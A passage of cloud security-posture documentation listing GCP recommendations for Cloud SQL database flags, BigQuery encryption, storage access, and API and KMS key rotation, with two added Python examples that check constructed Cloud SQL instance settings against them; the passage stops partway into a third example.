Description: The "log_min_duration_statement" flag defines the minimum amount of execution time of a statement in milliseconds where the total duration of the statement is logged. Ensure that "log_min_duration_statement" is disabled, i.e., a value of -1 is set.

Logging SQL statements may include sensitive information that should not be recorded in logs. This recommendation is applicable to PostgreSQL database instances.
Severity: Low


Recommendation: Ensure that the 'log_min_messages' database flag for Cloud SQL PostgreSQL instance is set appropriately
Description: The "log_min_error_statement" flag defines the minimum message severity level that is considered an error statement. Messages for error statements are logged with the SQL statement.

Valid values include "DEBUG5", "DEBUG4", "DEBUG3", "DEBUG2", "DEBUG1", "INFO", "NOTICE", "WARNING", "ERROR", "LOG", "FATAL", and "PANIC". Each severity level includes the subsequent levels mentioned above.

Note: To effectively turn off logging failing statements, set this parameter to PANIC.

ERROR is considered the best practice setting. Changes should only be made in accordance with the organization's logging policy.

Auditing helps in troubleshooting operational problems and also permits forensic analysis.

If "log_min_error_statement" is not set to the correct value, messages may not be classified as error messages appropriately. Considering general log messages as error messages would make it difficult to find actual errors, while considering only stricter severity levels as error messages may skip actual errors to log their SQL statements.

The "log_min_error_statement" flag should be set in accordance with the organization's logging policy. This recommendation is applicable to PostgreSQL database instances.
Severity: Low

Recommendation: Ensure that the 'log_temp_files' database flag for Cloud SQL PostgreSQL instance is set to '0'
Description: PostgreSQL can create a temporary file for actions such as sorting, hashing and temporary query results when these operations exceed "work_mem".

The "log_temp_files" flag controls logging of the name and the file size when a temporary file is deleted. Configuring "log_temp_files" to 0 causes all temporary file information to be logged, while positive values log only files whose size is greater than or equal to the specified number of kilobytes. A value of "-1" disables temporary file information logging.

If all temporary files are not logged, it may be more difficult to identify potential performance issues that may be due to either poor application coding or deliberate resource starvation attempts.
Severity: Low


Recommendation: Ensure VM disks for critical VMs are encrypted with Customer-Supplied Encryption Key
Description: Customer-Supplied Encryption Keys (CSEK) are a feature in Google Cloud Storage and Google Compute Engine. If you supply your own encryption keys, Google uses your key to protect the Google-generated keys used to encrypt and decrypt your data.

By default, Google Compute Engine encrypts all data at rest. Compute Engine handles and manages this encryption for you without any additional actions on your part. However, if you want to control and manage this encryption yourself, you can provide your own encryption keys.

If you provide your own encryption keys, Compute Engine uses your key to protect the Google-generated keys used to encrypt and decrypt your data. Only users who can provide the correct key can use resources protected by a customer-supplied encryption key.

Google does not store your keys on its servers and cannot access your protected data unless you provide the key. This also means that if you forget or lose your key, there is no way for Google to recover the key or to recover any data encrypted with the lost key.

At least business critical VMs should have VM disks encrypted with CSEK.
Severity: Medium

Recommendation: GCP projects should have Azure Arc auto provisioning enabled
Description: For full visibility of the security content from Microsoft Defender for Servers, GCP VM instances should be connected to Azure Arc. To ensure that all eligible VM instances automatically receive Azure Arc, enable auto-provisioning from Defender for Cloud at the GCP project level. Learn more about Azure Arc, and Microsoft Defender for Servers.
Severity: High


Recommendation: GCP VM instances should be connected to Azure Arc
Description: Connect your GCP Virtual Machines to Azure Arc in order to have full visibility to Microsoft Defender for Servers security content. Learn more about Azure Arc, and about Microsoft Defender for Servers on hybrid-cloud environments.
Severity: High

Recommendation: GCP VM instances should have OS config agent installed
Description: To receive the full Defender for Servers capabilities using Azure Arc auto-provisioning, GCP VMs should have the OS config agent enabled.
Severity: High

Recommendation: GKE cluster's auto repair feature should be enabled
Description: This recommendation evaluates the management property of a node pool for the key-value pair, 'key': 'autoRepair', 'value': true.
Severity: Medium

Recommendation: GKE cluster's auto upgrade feature should be enabled
Description: This recommendation evaluates the management property of a node pool for the key-value pair, 'key': 'autoUpgrade', 'value': true.
Severity: High

Recommendation: Monitoring on GKE clusters should be enabled
Description: This recommendation evaluates whether the monitoringService property of a cluster contains the location Cloud Monitoring should use to write metrics.
Severity: Medium

GCP Container recommendations

There are 4 GCP recommendations in this category.

Recommendation: Advanced configuration of Defender for Containers should be enabled on GCP connectors
Description: Microsoft Defender for Containers provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, and run-time protection. To ensure the solution is provisioned properly and the full set of capabilities is available, enable all advanced configuration settings.
Severity: High

Recommendation: GKE clusters should have Microsoft Defender's extension for Azure Arc installed
Description: Microsoft Defender's cluster extension provides security capabilities for your GKE clusters. The extension collects data from a cluster and its nodes to identify security vulnerabilities and threats. The extension works with Azure Arc-enabled Kubernetes. Learn more about Microsoft Defender for Cloud's security features for containerized environments.
Severity: High


Recommendation: GKE clusters should have the Azure Policy extension installed
Description: Azure Policy extension for Kubernetes extends Gatekeeper v3, an admission controller webhook for Open Policy Agent (OPA), to apply at-scale enforcements and safeguards on your clusters in a centralized, consistent manner. The extension works with Azure Arc-enabled Kubernetes.
Severity: High

Recommendation: Microsoft Defender for Containers should be enabled on GCP connectors
Description: Microsoft Defender for Containers provides cloud-native Kubernetes security capabilities including environment hardening, workload protection, and run-time protection. Enable the Containers plan on your GCP connector to harden the security of Kubernetes clusters and remediate security issues. Learn more about Microsoft Defender for Containers.
Severity: High


Data plane recommendations

All the data plane recommendations listed here are supported under GCP after enabling the Azure Policy extension.

GCP Data recommendations

There are 28 GCP recommendations in this category.


Recommendation: Ensure '3625 (trace flag)' database flag for Cloud SQL SQL Server instance is set to 'off'
Description: It is recommended to set the "3625 (trace flag)" database flag for Cloud SQL SQL Server instance to "off".

Trace flags are frequently used to diagnose performance issues or to debug stored procedures or complex computer systems, but they may also be recommended by Microsoft Support to address behavior that is negatively impacting a specific workload. All documented trace flags and those recommended by Microsoft Support are fully supported in a production environment when used as directed.

"3625 (trace log)" limits the amount of information returned to users who are not members of the sysadmin fixed server role, by masking the parameters of some error messages using '******'. This can help prevent disclosure of sensitive information, hence it is recommended to disable this flag.

This recommendation is applicable to SQL Server database instances.
Severity: Medium


Recommendation: Ensure 'external scripts enabled' database flag for Cloud SQL SQL Server instance is set to 'off'
Description: It is recommended to set the "external scripts enabled" database flag for Cloud SQL SQL Server instance to off. "external scripts enabled" enables the execution of scripts with certain remote language extensions. This property is OFF by default. When Advanced Analytics Services is installed, setup can optionally set this property to true.

As the "External Scripts Enabled" feature allows scripts external to SQL, such as files located in an R library, to be executed, which could adversely affect the security of the system, it should be disabled.

This recommendation is applicable to SQL Server database instances.
Severity: High

Recommendation: Ensure 'remote access' database flag for Cloud SQL SQL Server instance is set to 'off'
Description: It is recommended to set the "remote access" database flag for Cloud SQL SQL Server instance to "off".

The "remote access" option controls the execution of stored procedures from local or remote servers on which instances of SQL Server are running. The default value for this option is 1. This grants permission to run local stored procedures from remote servers or remote stored procedures from the local server. To prevent local stored procedures from being run from a remote server or remote stored procedures from being run on the local server, this must be disabled.

'Remote access' functionality can be abused to launch a Denial-of-Service (DoS) attack on remote servers by off-loading query processing to a target, hence it should be disabled.

This recommendation is applicable to SQL Server database instances.
Severity: High


Recommendation: Ensure 'skip_show_database' database flag for Cloud SQL MySQL instance is set to 'on'
Description: It is recommended to set the "skip_show_database" database flag for Cloud SQL MySQL instance to "on". The 'skip_show_database' database flag prevents people from using the SHOW DATABASES statement if they do not have the SHOW DATABASES privilege. This can improve security if you have concerns about users being able to see databases belonging to other users.

Its effect depends on the SHOW DATABASES privilege: If the variable value is ON, the SHOW DATABASES statement is permitted only to users who have the SHOW DATABASES privilege, and the statement displays all database names. If the value is OFF, SHOW DATABASES is permitted to all users, but displays the names of only those databases for which the user has the SHOW DATABASES or other privilege.

This recommendation is applicable to MySQL database instances.
Severity: Low

Recommendation: Ensure that a Default Customer-managed encryption key (CMEK) is specified for all BigQuery Data Sets
Description: BigQuery by default encrypts the data at rest by employing Envelope Encryption using Google-managed cryptographic keys. The data is encrypted using the data encryption keys, and the data encryption keys themselves are further encrypted using key encryption keys. This is seamless and does not require any additional input from the user.

However, if you want to have greater control, Customer-managed encryption keys (CMEK) can be used as the encryption key management solution for BigQuery Data Sets. Setting a Default Customer-managed encryption key (CMEK) for a data set ensures that any tables created in future will use the specified CMEK if none other is provided.

Note: Google does not store your keys on its servers and cannot access your protected data unless you provide the key. This also means that if you forget or lose your key, there is no way for Google to recover the key or to recover any data encrypted with the lost key.
Severity: Medium
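One checker for the database flag recommendations on this page: the PostgreSQL flags in the GCP Compute table above (log_duration, the *_stats flags, log_min_error_statement "ERROR or stricter", log_checkpoints, log_lock_waits, log_min_duration_statement, log_temp_files) and the SQL Server and MySQL flags in this table (3625, external scripts enabled, remote access, skip_show_database), read from the databaseFlags list of a Cloud SQL instance. This is an added example, not Microsoft's or Google's code; the engine defaults assumed when a flag is not set are taken from the engine documentation and the defaults stated above, and the instances are constructed.

```python
# Added example (not Microsoft's or Google's code): evaluate a Cloud SQL
# instance resource (sqladmin instances.get shape: databaseVersion plus
# settings.databaseFlags as [{"name", "value"}]) against the flag
# recommendations above for PostgreSQL, SQL Server and MySQL instances.
from collections import namedtuple

# A rule names the flag, a predicate over its string value, and the value
# assumed when the flag is not set (the engine default; assumption taken
# from the engine documentation and the defaults stated on the page).
Rule = namedtuple("Rule", "flag check default")

ON_VALUES = {"on", "true", "1"}
OFF_VALUES = {"off", "false", "0"}
# PostgreSQL message severities, least to most severe (the list above).
PG_LEVELS = ["DEBUG5", "DEBUG4", "DEBUG3", "DEBUG2", "DEBUG1", "INFO",
             "NOTICE", "WARNING", "ERROR", "LOG", "FATAL", "PANIC"]


def is_on(value):
    return value.strip().lower() in ON_VALUES


def is_off(value):
    return value.strip().lower() in OFF_VALUES


def equals(expected):
    """Predicate factory for flags that must hold one exact value."""
    return lambda value: value.strip() == expected


def error_or_stricter(value):
    """'ERROR' or any level after it in PG_LEVELS; unknown values fail."""
    level = value.strip().upper()
    return level in PG_LEVELS and PG_LEVELS.index(level) >= PG_LEVELS.index("ERROR")


RULES_BY_ENGINE = {
    "POSTGRES_": [
        Rule("log_duration", is_on, "off"),
        Rule("log_executor_stats", is_off, "off"),
        Rule("log_parser_stats", is_off, "off"),
        Rule("log_planner_stats", is_off, "off"),
        Rule("log_statement_stats", is_off, "off"),
        Rule("log_min_error_statement", error_or_stricter, "error"),
        Rule("log_checkpoints", is_on, "off"),
        Rule("log_lock_waits", is_on, "off"),
        Rule("log_min_duration_statement", equals("-1"), "-1"),
        Rule("log_temp_files", equals("0"), "-1"),
    ],
    "SQLSERVER_": [
        Rule("3625", is_off, "off"),
        Rule("external scripts enabled", is_off, "off"),
        Rule("remote access", is_off, "on"),  # default is 1 (on), per the page
    ],
    "MYSQL_": [
        Rule("skip_show_database", is_on, "off"),
    ],
}


def evaluate_cloud_sql_instance(instance):
    """Return {flag: passed} for the rules that apply to the instance's engine."""
    version = instance.get("databaseVersion", "")
    rules = next((r for prefix, r in RULES_BY_ENGINE.items()
                  if version.startswith(prefix)), [])
    configured = {f["name"]: str(f["value"])
                  for f in instance.get("settings", {}).get("databaseFlags", [])}
    return {rule.flag: rule.check(configured.get(rule.flag, rule.default))
            for rule in rules}


# Constructed sample instances (not real resources).
PG_INSTANCE = {
    "name": "orders-pg",
    "databaseVersion": "POSTGRES_14",
    "settings": {"databaseFlags": [
        {"name": "log_duration", "value": "on"},
        {"name": "log_temp_files", "value": "0"},
        {"name": "log_min_error_statement", "value": "warning"},  # too permissive
        {"name": "log_min_duration_statement", "value": "500"},   # logs statement text
    ]},
}
MSSQL_INSTANCE = {"name": "erp-mssql", "databaseVersion": "SQLSERVER_2019_STANDARD",
                  "settings": {"databaseFlags": []}}

if __name__ == "__main__":
    for inst in (PG_INSTANCE, MSSQL_INSTANCE):
        failed = [f for f, ok in evaluate_cloud_sql_instance(inst).items() if not ok]
        print(inst["name"], "failing flags:", failed)
```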


Recommendation: Ensure that all BigQuery Tables are encrypted with Customer-managed encryption key (CMEK)
Description: BigQuery by default encrypts the data at rest by employing Envelope Encryption using Google-managed cryptographic keys. The data is encrypted using the data encryption keys, and the data encryption keys themselves are further encrypted using key encryption keys. This is seamless and does not require any additional input from the user.

However, if you want to have greater control, Customer-managed encryption keys (CMEK) can be used as the encryption key management solution for BigQuery tables. If CMEK is used, the CMEK is used to encrypt the data encryption keys instead of using Google-managed encryption keys. BigQuery stores the table and CMEK association and the encryption/decryption is done automatically.

Applying the Default Customer-managed keys on BigQuery data sets ensures that all the new tables created in the future will be encrypted using CMEK, but existing tables need to be updated to use CMEK individually.

Note: Google does not store your keys on its servers and cannot access your protected data unless you provide the key. This also means that if you forget or lose your key, there is no way for Google to recover the key or to recover any data encrypted with the lost key.
Severity: Medium

Recommendation: Ensure that BigQuery datasets are not anonymously or publicly accessible
Description: It is recommended that the IAM policy on BigQuery datasets does not allow anonymous and/or public access. Granting permissions to allUsers or allAuthenticatedUsers allows anyone to access the dataset. Such access might not be desirable if sensitive data is being stored in the dataset. Therefore, ensure that anonymous and/or public access to a dataset is not allowed.
Severity: High


Recommendation: Ensure that Cloud SQL database instances are configured with automated backups
Severity: High
Description:
It is recommended to have all SQL database instances set to enable automated backups. Backups provide a way to restore a Cloud SQL instance to recover lost data or recover from a problem with that instance. Automated backups need to be set for any instance that contains data that should be protected from loss or damage. This recommendation is applicable for SQL Server, PostgreSQL, MySQL generation 1 and MySQL generation 2 instances.

Recommendation: Ensure that Cloud SQL database instances are not open to the world
Severity: High
Description:
A database server should accept connections only from trusted networks/IPs and restrict access from the world. To minimize the attack surface of a database server instance, only trusted, known and required IPs should be whitelisted to connect to it.

An authorized network should not have IPs/networks configured to "0.0.0.0/0", which allows access to the instance from anywhere in the world. Note that authorized networks apply only to instances with public IPs.

Recommendation: Ensure that Cloud SQL database instances do not have public IPs
Severity: High
Description:
It is recommended to configure Second Generation SQL instances to use private IPs instead of public IPs. To lower the organization's attack surface, Cloud SQL databases should not have public IPs. Private IPs provide improved network security and lower latency for your application.

Recommendation: Ensure that Cloud Storage bucket is not anonymously or publicly accessible
Severity: High
Description:
It is recommended that the IAM policy on a Cloud Storage bucket does not allow anonymous or public access. Allowing anonymous or public access grants anyone permission to access bucket content. Such access might not be desired if you are storing any sensitive data. Hence, ensure that anonymous or public access to a bucket is not allowed.


Recommendation: Ensure that Cloud Storage buckets have uniform bucket-level access enabled
Severity: Medium
Description:
It is recommended that uniform bucket-level access is enabled on Cloud Storage buckets, to unify and simplify how you grant access to your Cloud Storage resources.

Cloud Storage offers two systems for granting users permission to access your buckets and objects: Cloud Identity and Access Management (Cloud IAM) and Access Control Lists (ACLs). These systems act in parallel: in order for a user to access a Cloud Storage resource, only one of the systems needs to grant the user permission. Cloud IAM is used throughout Google Cloud and allows you to grant a variety of permissions at the bucket and project levels. ACLs are used only by Cloud Storage and have limited permission options, but they allow you to grant permissions on a per-object basis.

In order to support a uniform permissioning system, Cloud Storage has uniform bucket-level access. Using this feature disables ACLs for all Cloud Storage resources: access to Cloud Storage resources is then granted exclusively through Cloud IAM. Enabling uniform bucket-level access guarantees that if a storage bucket is not publicly accessible, no object in the bucket is publicly accessible either.


Recommendation: Ensure that Compute instances have Confidential Computing enabled
Severity: High
Description:
Google Cloud encrypts data at rest and in transit, but customer data must be decrypted for processing. Confidential Computing is a breakthrough technology which encrypts data in use, while it is being processed. Confidential Computing environments keep data encrypted in memory and elsewhere outside the central processing unit (CPU).

Confidential VMs leverage the Secure Encrypted Virtualization (SEV) feature of AMD EPYC CPUs. Customer data will stay encrypted while it is used, indexed, queried, or trained on. Encryption keys are generated in hardware, per VM, and are not exportable. Thanks to built-in hardware optimizations of both performance and security, there is no significant performance penalty for Confidential Computing workloads.

Confidential Computing keeps customers' sensitive code and other data encrypted in memory during processing. Google does not have access to the encryption keys. Confidential VMs can help alleviate concerns about risk related to either dependency on Google infrastructure or Google insiders' access to customer data in the clear.

Recommendation: Ensure that retention policies on log buckets are configured using Bucket Lock
Severity: Low
Description:
Enabling retention policies on log buckets will protect logs stored in Cloud Storage buckets from being overwritten or accidentally deleted. It is recommended to set up retention policies and configure Bucket Lock on all storage buckets that are used as log sinks.

Logs can be exported by creating one or more sinks that include a log filter and a destination. As Stackdriver Logging receives new log entries, they are compared against each sink. If a log entry matches a sink's filter, then a copy of the log entry is written to the destination. Sinks can be configured to export logs to storage buckets.

It is recommended to configure a data retention policy for these Cloud Storage buckets and to lock the data retention policy, thus permanently preventing the policy from being reduced or removed. This way, if the system is ever compromised by an attacker or a malicious insider who wants to cover their tracks, the activity logs are preserved for forensics and security investigations.


Recommendation: Ensure that the Cloud SQL database instance requires all incoming connections to use SSL
Severity: High
Description:
It is recommended to enforce that all incoming connections to a SQL database instance use SSL. SQL database connections, if successfully intercepted (MITM), can reveal sensitive data like credentials, database queries, query outputs, etc. For security, it is recommended to always use SSL encryption when connecting to your instance. This recommendation is applicable for PostgreSQL, MySQL generation 1 and MySQL generation 2 instances.

Recommendation: Ensure that the 'contained database authentication' database flag for Cloud SQL on the SQL Server instance is set to 'off'
Severity: Medium
Description:
It is recommended to set the "contained database authentication" database flag for Cloud SQL on the SQL Server instance to "off".

A contained database includes all database settings and metadata required to define the database and has no configuration dependencies on the instance of the Database Engine where the database is installed. Users can connect to the database without authenticating a login at the Database Engine level. Isolating the database from the Database Engine makes it possible to easily move the database to another instance of SQL Server.

Contained databases have some unique threats that should be understood and mitigated by SQL Server Database Engine administrators. Most of the threats are related to the USER WITH PASSWORD authentication process, which moves the authentication boundary from the Database Engine level to the database level; hence it is recommended to disable this flag. This recommendation is applicable to SQL Server database instances.

Recommendation: Ensure that the 'cross db ownership chaining' database flag for Cloud SQL SQL Server instance is set to 'off'
Severity: Medium
Description:
It is recommended to set the "cross db ownership chaining" database flag for Cloud SQL SQL Server instances to "off". Use the "cross db ownership chaining" option to configure cross-database ownership chaining for an instance of Microsoft SQL Server. This server option allows you to control cross-database ownership chaining at the database level or to allow cross-database ownership chaining for all databases.

Enabling "cross db ownership chaining" is not recommended unless all of the databases hosted by the instance of SQL Server must participate in cross-database ownership chaining and you are aware of the security implications of this setting. This recommendation is applicable to SQL Server database instances.


Recommendation: Ensure that the 'local_infile' database flag for a Cloud SQL MySQL instance is set to 'off'
Severity: Medium
Description:
It is recommended to set the local_infile database flag for a Cloud SQL MySQL instance to off.

The local_infile flag controls the server-side LOCAL capability for LOAD DATA statements. Depending on the local_infile setting, the server refuses or permits local data loading by clients that have LOCAL enabled on the client side. To explicitly cause the server to refuse LOAD DATA LOCAL statements (regardless of how client programs and libraries are configured at build time or runtime), start mysqld with local_infile disabled. local_infile can also be set at runtime.

Due to the security issues associated with the local_infile flag, it is recommended to disable it. This recommendation is applicable to MySQL database instances.

Recommendation: Ensure that the log metric filter and alerts exist for Cloud Storage IAM permission changes
Severity: Low
Description:
It is recommended that a metric filter and alarm be established for Cloud Storage bucket IAM changes. Monitoring changes to Cloud Storage bucket permissions may reduce the time needed to detect and correct permissions on sensitive Cloud Storage buckets and objects inside the bucket.

Recommendation: Ensure that the log metric filter and alerts exist for SQL instance configuration changes
Severity: Low
Description:
It is recommended that a metric filter and alarm be established for SQL instance configuration changes. Monitoring SQL instance configuration changes may reduce the time needed to detect and correct misconfigurations on the SQL server.

Below are a few of the configurable options which may impact the security posture of a SQL instance:

* Enable auto backups and high availability: misconfiguration may adversely impact business continuity, disaster recovery, and high availability
* Authorized networks: misconfiguration may increase exposure to untrusted networks


Recommendation: Ensure that there are only GCP-managed service account keys for each service account
Severity: Low
Description:
User-managed service accounts should not have user-managed keys. Anyone who has access to the keys will be able to access resources through the service account.

GCP-managed keys are used by Cloud Platform services such as App Engine and Compute Engine. These keys cannot be downloaded. Google will keep the keys and automatically rotate them on an approximately weekly basis.

User-managed keys are created, downloadable, and managed by users. They expire 10 years from creation. For user-managed keys, the user has to take ownership of key management activities, which include:

- Key storage
- Key distribution
- Key revocation
- Key rotation
- Protecting the keys from unauthorized users
- Key recovery

Even with key owner precautions, keys can be easily leaked by common development malpractices like checking keys into the source code or leaving them in the Downloads directory, or accidentally leaving them on support blogs/channels. It is recommended to prevent user-managed service account keys.


Recommendation: Ensure 'user connections' database flag for Cloud SQL SQL Server instance is set as appropriate
Severity: Low
Description:
It is recommended to set the "user connections" database flag for Cloud SQL SQL Server instances according to an organization-defined value.

The "user connections" option specifies the maximum number of simultaneous user connections that are allowed on an instance of SQL Server. The actual number of user connections allowed also depends on the version of SQL Server that you are using, and also on the limits of your application or applications and hardware.

SQL Server allows a maximum of 32,767 user connections. Because user connections is a dynamic (self-configuring) option, SQL Server adjusts the maximum number of user connections automatically as needed, up to the maximum value allowable. For example, if only 10 users are logged in, 10 user connection objects are allocated. In most cases, you do not have to change the value for this option. The default is 0, which means that the maximum (32,767) user connections are allowed.

This recommendation is applicable to SQL Server database instances.

Recommendation: Ensure 'user options' database flag for Cloud SQL SQL Server instance is not configured
Severity: Low
Description:
It is recommended that the "user options" database flag for Cloud SQL SQL Server instances is not configured.

The "user options" option specifies global defaults for all users. A list of default query processing options is established for the duration of a user's work session. The user options option allows you to change the default values of the SET options (if the server's default settings are not appropriate). A user can override these defaults by using the SET statement.

You can configure user options dynamically for new logins. After you change the setting of user options, new login sessions use the new setting; current login sessions are not affected.

This recommendation is applicable to SQL Server database instances.

Recommendation: Logging for GKE clusters should be enabled
Severity: High
Description:
This recommendation evaluates whether the loggingService property of a cluster contains the location Cloud Logging should use to write logs.
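The Cloud SQL recommendations above (automated backups, not open to the world, no public IPs, SSL required, and the contained database authentication, cross db ownership chaining, local_infile, user connections and user options flags) all read from one instance's settings, so a single evaluator can cover them. The following is an added example, not code from the Defender for Cloud documentation; the instance documents are constructed samples shaped like the Cloud SQL Admin API DatabaseInstance resource, and the names and network path in them are placeholders.

```python
"""Evaluate Cloud SQL instances against the recommendations described above:
automated backups, no public IP, no 0.0.0.0/0 authorized network, SSL required
(MySQL/PostgreSQL) and the MySQL/SQL Server database flags.

Added example, not part of the Defender for Cloud documentation. The instance
documents are constructed samples shaped like the Cloud SQL Admin API
DatabaseInstance resource (databaseVersion, settings.backupConfiguration,
settings.ipConfiguration, settings.databaseFlags); only the fields the checks
read are present.
"""

# Database flags the page wants explicitly set to "off", keyed by engine prefix.
FLAGS_MUST_BE_OFF = {
    "MYSQL": ["local_infile"],
    "SQLSERVER": ["contained database authentication", "cross db ownership chaining"],
}


def _flags(instance):
    """Return settings.databaseFlags as {name: value}, values as lowercase strings."""
    flags = instance.get("settings", {}).get("databaseFlags", [])
    return {f["name"]: str(f.get("value", "")).lower() for f in flags}


def check_instance(instance, expected_user_connections=None):
    """Return a list of (finding, severity) tuples for one instance.

    expected_user_connections is the organization-defined value for the SQL
    Server 'user connections' flag; None skips that comparison.
    """
    settings = instance.get("settings", {})
    ip_cfg = settings.get("ipConfiguration", {})
    engine = instance.get("databaseVersion", "").split("_")[0]  # MYSQL, POSTGRES, SQLSERVER
    flags = _flags(instance)
    findings = []

    if not settings.get("backupConfiguration", {}).get("enabled", False):
        findings.append(("automated backups are not enabled", "High"))

    # A public IPv4 address is itself a finding; authorized networks only apply
    # to instances that have one, and 0.0.0.0/0 admits the whole internet.
    if ip_cfg.get("ipv4Enabled", False):
        findings.append(("instance has a public IP; use a private IP instead", "High"))
        if any(n.get("value") == "0.0.0.0/0" for n in ip_cfg.get("authorizedNetworks", [])):
            findings.append(("authorized network 0.0.0.0/0 opens the instance to the world", "High"))

    # The SSL recommendation applies to MySQL and PostgreSQL instances.
    if engine in ("MYSQL", "POSTGRES") and not ip_cfg.get("requireSsl", False):
        findings.append(("incoming connections are not required to use SSL", "High"))

    # An absent flag counts as "not set to off": the page asks for an explicit setting.
    for name in FLAGS_MUST_BE_OFF.get(engine, []):
        if flags.get(name) != "off":
            findings.append((f"database flag '{name}' is not set to off", "Medium"))

    if engine == "SQLSERVER":
        if "user options" in flags:
            findings.append(("database flag 'user options' is configured", "Low"))
        if (expected_user_connections is not None
                and flags.get("user connections") != str(expected_user_connections)):
            findings.append(("database flag 'user connections' differs from the organization-defined value", "Low"))

    return findings


# Constructed sample instances; names and network paths are placeholders.
COMPLIANT_MYSQL = {
    "name": "example-mysql",
    "databaseVersion": "MYSQL_8_0",
    "settings": {
        "backupConfiguration": {"enabled": True},
        "ipConfiguration": {"ipv4Enabled": False, "requireSsl": True,
                            "privateNetwork": "projects/example-project/global/networks/default"},
        "databaseFlags": [{"name": "local_infile", "value": "off"}],
    },
}

EXPOSED_SQLSERVER = {
    "name": "example-sqlserver",
    "databaseVersion": "SQLSERVER_2019_STANDARD",
    "settings": {
        "backupConfiguration": {"enabled": False},
        "ipConfiguration": {
            "ipv4Enabled": True,
            "authorizedNetworks": [{"name": "anywhere", "value": "0.0.0.0/0"}],
        },
        "databaseFlags": [
            {"name": "contained database authentication", "value": "on"},
            {"name": "user options", "value": "32"},
            {"name": "user connections", "value": "0"},
        ],
    },
}


if __name__ == "__main__":
    for inst in (COMPLIANT_MYSQL, EXPOSED_SQLSERVER):
        print(inst["name"])
        for finding, severity in check_instance(inst, expected_user_connections=500) or [("no findings", "-")]:
            print(f"  [{severity}] {finding}")
```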


Recommendation: Object versioning should be enabled on storage buckets where sinks are configured
Severity: High
Description:
This recommendation evaluates whether the enabled field in the bucket's versioning property is set to true.

Recommendation: Over-provisioned identities in projects should be investigated to reduce the Permission Creep Index (PCI)
Severity: Medium
Description:
Over-provisioned identities in projects should be investigated to reduce the Permission Creep Index (PCI) and to safeguard your infrastructure. Reduce the PCI by removing unused high-risk permission assignments. A high PCI reflects the risk associated with identities whose permissions exceed their normal or required usage.

Recommendation: Projects that have cryptographic keys should not have users with Owner permissions
Severity: Medium
Description:
This recommendation evaluates the IAM allow policy in project metadata for principals assigned roles/Owner.

Recommendation: Storage buckets used as a log sink should not be publicly accessible
Severity: High
Description:
This recommendation evaluates the IAM policy of a bucket for the principals allUsers or allAuthenticatedUsers, which grant public access.


GCP IdentityAndAccess recommendations 


There are 25 GCP recommendations in this category. 


Recommendation: Cryptographic keys should not have more than three users
Severity: Medium
Description:
This recommendation evaluates IAM policies for key rings, projects, and organizations, and retrieves principals with roles that allow them to encrypt, decrypt or sign data using Cloud KMS keys: roles/owner, roles/cloudkms.cryptoKeyEncrypterDecrypter, roles/cloudkms.cryptoKeyEncrypter, roles/cloudkms.cryptoKeyDecrypter, roles/cloudkms.signer, and roles/cloudkms.signerVerifier.


Recommendation: Ensure API keys are not created for a project
Severity: High
Description:
Keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. It is recommended to use the standard authentication flow instead.

Security risks involved in using API keys appear below:

1. API keys are simple encrypted strings
2. API keys do not identify the user or the application making the API request
3. API keys are typically accessible to clients, making it easy to discover and steal an API key

To avoid the security risk in using API keys, it is recommended to use the standard authentication flow instead.

Recommendation: Ensure API keys are restricted to only APIs that application needs access
Severity: High
Description:
API keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. It is recommended to restrict API keys to use (call) only the APIs required by an application.

Security risks involved in using API keys are below:

1. API keys are simple encrypted strings
2. API keys do not identify the user or the application making the API request
3. API keys are typically accessible to clients, making it easy to discover and steal an API key

In light of these potential risks, Google recommends using the standard authentication flow instead of API keys. However, there are limited cases where API keys are more appropriate. For example, if there is a mobile application that needs to use the Google Cloud Translation API, but doesn't otherwise need a backend server, API keys are the simplest way to authenticate to that API.

In order to reduce attack surfaces by providing least privileges, API keys can be restricted to use (call) only the APIs required by an application.


Recommendation: Ensure API keys are restricted to use by only specified Hosts and Apps
Severity: High
Description:
Unrestricted keys are insecure because they can be viewed publicly, such as from within a browser, or they can be accessed on a device where the key resides. It is recommended to restrict API key usage to trusted hosts, HTTP referrers and apps.

Security risks involved in using API keys appear below:

1. API keys are simple encrypted strings
2. API keys do not identify the user or the application making the API request
3. API keys are typically accessible to clients, making it easy to discover and steal an API key

In light of these potential risks, Google recommends using the standard authentication flow instead of API keys. However, there are limited cases where API keys are more appropriate. For example, if there is a mobile application that needs to use the Google Cloud Translation API, but doesn't otherwise need a backend server, API keys are the simplest way to authenticate to that API.

In order to reduce attack vectors, API keys can be restricted to only trusted hosts, HTTP referrers and applications.


Recommendation: Ensure API keys are rotated every 90 days
Severity: High
Description:
It is recommended to rotate API keys every 90 days.

Security risks involved in using API keys are listed below:

1. API keys are simple encrypted strings
2. API keys do not identify the user or the application making the API request
3. API keys are typically accessible to clients, making it easy to discover and steal an API key

Because of these potential risks, Google recommends using the standard authentication flow instead of API keys. However, there are limited cases where API keys are more appropriate. For example, if there is a mobile application that needs to use the Google Cloud Translation API, but doesn't otherwise need a backend server, API keys are the simplest way to authenticate to that API.

Once a key is stolen, it has no expiration, meaning it may be used indefinitely unless the project owner revokes or regenerates the key. Rotating API keys will reduce the window of opportunity for an access key that is associated with a compromised or terminated account to be used. API keys should be rotated to ensure that data cannot be accessed with an old key that might have been lost, cracked, or stolen.


Recommendation: Ensure KMS encryption keys are rotated within a period of 90 days
Severity: Medium
Description:
Google Cloud Key Management Service stores cryptographic keys in a hierarchical structure designed for useful and elegant access control management.

A key is a named object representing a "cryptographic key" used for a specific purpose. The key material, the actual bits used for "encryption", can change over time as new key versions are created. A key is used to protect some "corpus of data": a collection of files could be encrypted with the same key, and people with "decrypt" permissions on that key would be able to decrypt those files.

Set a key rotation period and starting time. A key can be created with a specified "rotation period", which is the time between when new key versions are generated automatically. A key can also be created with a specified next rotation time. The format for the rotation schedule depends on the client library that is used. For the gcloud command-line tool, the next rotation time must be in "ISO" or "RFC3339" format, and the rotation period must be in the form "INTEGER[UNIT]", where the unit can be one of seconds (s), minutes (m), hours (h) or days (d).

Therefore, it's necessary to make sure the "rotation period" is set to a specific time.
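To check a key's schedule against the 90-day limit, the rotation period in the INTEGER[UNIT] form described above and the RFC 3339 next rotation time both have to be parsed. The following is an added example, not code from the Defender for Cloud documentation or from Google; the key records are constructed samples using the Cloud KMS CryptoKey field names rotationPeriod and nextRotationTime, and the key names are placeholders.

```python
"""Check Cloud KMS key rotation settings against the 90-day limit described above.

Added example, not part of the Defender for Cloud documentation. It parses the
rotation period in the INTEGER[UNIT] form the page describes (s, m, h, d) and the
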